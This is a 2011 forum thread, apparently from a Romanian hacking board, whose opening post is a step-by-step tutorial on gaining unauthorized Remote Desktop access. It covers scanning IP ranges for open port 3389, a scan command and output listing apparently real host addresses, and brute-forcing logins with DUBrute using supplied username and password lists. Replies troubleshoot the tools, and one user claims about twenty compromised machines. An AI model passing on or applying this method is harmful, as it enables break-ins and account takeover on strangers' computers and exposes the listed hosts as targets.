Fed0t Posted October 28, 2011 Report Share Posted October 28, 2011 RDP Hacking /Cracking RDP Hacking Today you are going to see an other way how to gain RDP(Remote Desktop Port) Access. This method is Brute-Forcing and its with tools You have pictures and everything so i hope you like it and share some results ! -First there are two tools for scanning a rdp's 1.RDP Brute 2.VNC-Scanner Letz start with RDP Brute! This tool is scanning the ip's and it check them if they have open 3389 open port that is RDP(Remote Desktop Port) open!1.Type the IP Address you wonna scan- 4 an example 94.82.106.12.Type the IP Adrees where to stop the scanning - 4 an expamle 94.82.106.2553.Press the Start Scann ButtonWhen the scanning finish go to RDP Brute Folder and there is file VNC_bypauth.txtWhen you open it you will see something like this:----------------------------------------------------------------------------COMMAND: work\VNC.exe -i 94.82.106.1-94.82.156.255 -p 3389 -cT -T 400----------------------------------------------------------------------------94.82.106.193 :3389 94.82.108.102 :3389 94.82.108.210 :3389 94.82.108.241 :3389 94.82.108.243 :3389 94.82.108.245 :3389 94.82.108.247 :3389 94.82.110.35 :3389 94.82.110.109 :3389 94.82.112.2 :3389 94.82.115.130 :3389 94.82.119.19 :3389 94.82.125.14 :3389 94.82.124.190 :3389 94.82.125.186 :3389 94.82.125.226 :3389 94.82.127.195 :3389 94.82.128.194 :3389 94.82.130.152 :3389 94.82.130.153 :3389 94.82.130.154 :3389 94.82.130.155 :3389 94.82.130.156 :3389 94.82.130.157 :3389 94.82.130.159 :3389 94.82.130.158 :3389 94.82.131.54 :3389 94.82.132.130 :3389 94.82.132.178 :3389 94.82.133.178 :3389 94.82.133.209 :3389 94.82.136.241 :3389 94.82.141.9 :3389 94.82.140.88 :3389 94.82.141.66 :3389 94.82.143.225 :3389 94.82.145.7 :3389 94.82.146.209 :3389 94.82.147.50 :3389 94.82.149.104 :3389 94.82.151.122 :3389 94.82.151.185 :3389 94.82.151.252 :3389 94.82.152.242 :3389 94.82.154.152 :3389 94.82.156.203 :3389 94.82.156.204 :3389 ----------------------------------------------------------------------------Scan complete--------------------------------------------[heapoverflow.com 2004-2005]----Now copy all IP's but remove the port :3389.When you do that we are ready to brute but for that we will speak a bit later when we explane how to scan with VNC-Scanner.-VNC-Scanner1.Chose the country you wonna to scan2.Click on "Get diap List"3.Press Start Scan Button.4.When the Scanning Finish Press "Start Parser" button.Now go to VNC-Scanner Folder and in a text file u will find all availabe RDP Ip's2.Now The Brute Force StepFor This we use DUBruteClick on "Generation" and you will see this:1.Click on File Ip and find the txt file where are the scanned IP's witch have open RDPort2.Here you enter some Login Names I will post a list of them later3.Here enter some Passwords Also i will provide you with a list4.When u finish the first 3 stpes now press "Make"5.And press "Exit"Now click Start and the scanning begginsWhen the scanning Ends you will find a txt file in DUBrute foler named good.txt there are all the RDP where u can access them!Usernames:administratorguestadminserver1testuseruser1user2user3Password List:!!!!!!!!!@!@#!@#$!@#$%!@#$%^!@#$%^&!@#$%^&*!@#$%^&*()!@#$%^&*()_+!@#$%^&*()_+|!QWERTY#@!$#@!%username%%username%1%username%12%username%123%username%1234****00000000000000000000000000000000000000700700701230123401234501234560123502460249098765432109878651111111111111111111111111111111111111112221121121122112233112311331133551212121212121225123123123123321123412345123456123456012345651234567123456781234567891234567890123487651234qwer1234rewq123654123abc123ewq123qwe123qweasdzxc123zxc12qwaszx13131313131a2b3c1p2o3i1q2w3e1q2w3e*1q2w3e4r1qaz2wsx1qazxsw21qw23e1qw23er45ty67u1qwerty1qz1sanjose2000200120022003200420052006200720082009201021211221122112222222222222222222222222222222222222244663321321123321321321654987321adc33332211333333333333333333333333333333333345213693698521473904iurf44444444444444444444444444444444444445612345632145678948977985555555555555555555555555555555555555678905683576823665432166666666666666666666666666666666666696969696977182937531597654321777777777777777777777777777777777777893217896547897984880486867530987654321888888888888888888888888888888888889902109119207296857498745698765498765432199999999999999999999999999999999999@#$%^&@admin@admin@@administrator@dmin@dministratorAAAAAAASDASASDFGoogleLocalAdministratorP@SSP@SSWORDP@ssw0rdPassw0rd1Password1QWERTY!QwerSQwerUQwerUaaaaaaabcabc123abcdacceptaccessadmadm1nadm1n1stratoradm1nistratoradminadmin!admin1admin12admin123admin123456adminadminadministrat0radministratoradministrator1administrator123administratorsadminrootadminsadminserveradminserversadmproadmsuperanonanonymousappleaqwertasdasdasdasdfgasdfghasdfghjklasdzxcasemblerasusavatarbackupbasebasicbetac#c++codescomcompanycomputerconnectconsolecoolcooladmincxzasdcyberdatacenterdedicateddefaultdemodenmarkdomaindosedcxswftpfuckgodgoodguesthackhackerhellohelphomehosthousehpibmicqidinfoinstallinternetipkeykeyslamelamerlaptoplinuxlocklockoutloginlolmacmailmainmaincomputermanagermarchmastermaxmegabitmembermicrosoftmycomputermyhomemypassmypasswordmyservermysqlnetnetworknokianopassnopasswnopasswordnopwdntofficeopenp@$$w0rdpa$$wordpascalpasspass123pass1234passepasswpassw0rdpasswdpasswordpassword12password123passwordspcphpphpadminpornopowerpubpublicpwdqq1w2q1w2Q!W@q1w2e3q1w2e3e4q1w2e3r4q1w2e3r4t5qazqazedcqazqazqazwsxqazwsxedcqazxswedcqazxswedcvfrqazzaqqqqqqqscgyjquakequestqw1234erqwaszxqweqwe123qwe321qwe456qweasdqweasdzxcqwedsaqweqweqwerqwer123qwerasdfqwertqwertyqwerty1qwerty123r00tremoterootrouterrusscriptsecretsecurityservserverserviceservicesservpasssetupsexsexsexsiemensspamspeedsqlstartstopsuccesssupersuperadmsupportsyssysadminsystemsystem32tempterminaltesttesterunixuseruser123usernameusersusrvpnwebwelcomewinwin2000win2003win2008win32windowswindows2003windowsxpwinxpwordworkworkedworkgroupwwwwwxswqazzzaq1xsw2zaqxswzaxscdzsxdczsxdcfvgzxczxcasdzxcasdqwezxcvzxcvbzxcvbnzxcvbnmzxczxczzzI dont have the programs i...loose them,but search them on google. Quote Link to comment Share on other sites More sharing options...
ema2peu Posted October 29, 2011 Report Share Posted October 29, 2011 ai idee dupa atatea ore de ce imi da ERROR la alea ? ms.. Quote Link to comment Share on other sites More sharing options...
keenzo Posted October 29, 2011 Report Share Posted October 29, 2011 cum fac sa sterg doar portu dupa ce imi gaseste ca sa pot copia numa ip-urile?? fara porturi? Quote Link to comment Share on other sites More sharing options...
Fed0t Posted October 30, 2011 Author Report Share Posted October 30, 2011 cum fac sa sterg doar portu dupa ce imi gaseste ca sa pot copia numa ip-urile?? fara porturi?de ce vrei sa stergi porturile? Quote Link to comment Share on other sites More sharing options...
ema2peu Posted November 20, 2011 Report Share Posted November 20, 2011 ai idee dupa atatea ore de ce imi da ERROR la alea ? ms..stie cineva? am incercat pe putin 5 rdp`uri si tot asa se intampla Quote Link to comment Share on other sites More sharing options...
Wozniak Posted December 21, 2011 Report Share Posted December 21, 2011 stie cineva? am incercat pe putin 5 rdp`uri si tot asa se intamplaAceeasi problema o am si eu . Din toate incercate nu a fost niciunu bun . La good am avut 0 iar la error toate Quote Link to comment Share on other sites More sharing options...
orion.hacker Posted December 21, 2011 Report Share Posted December 21, 2011 la mine nu merge "get diap list"...dar le introduc manual..si merge...am vre-o 20 sparte pana acu:) Quote Link to comment Share on other sites More sharing options...
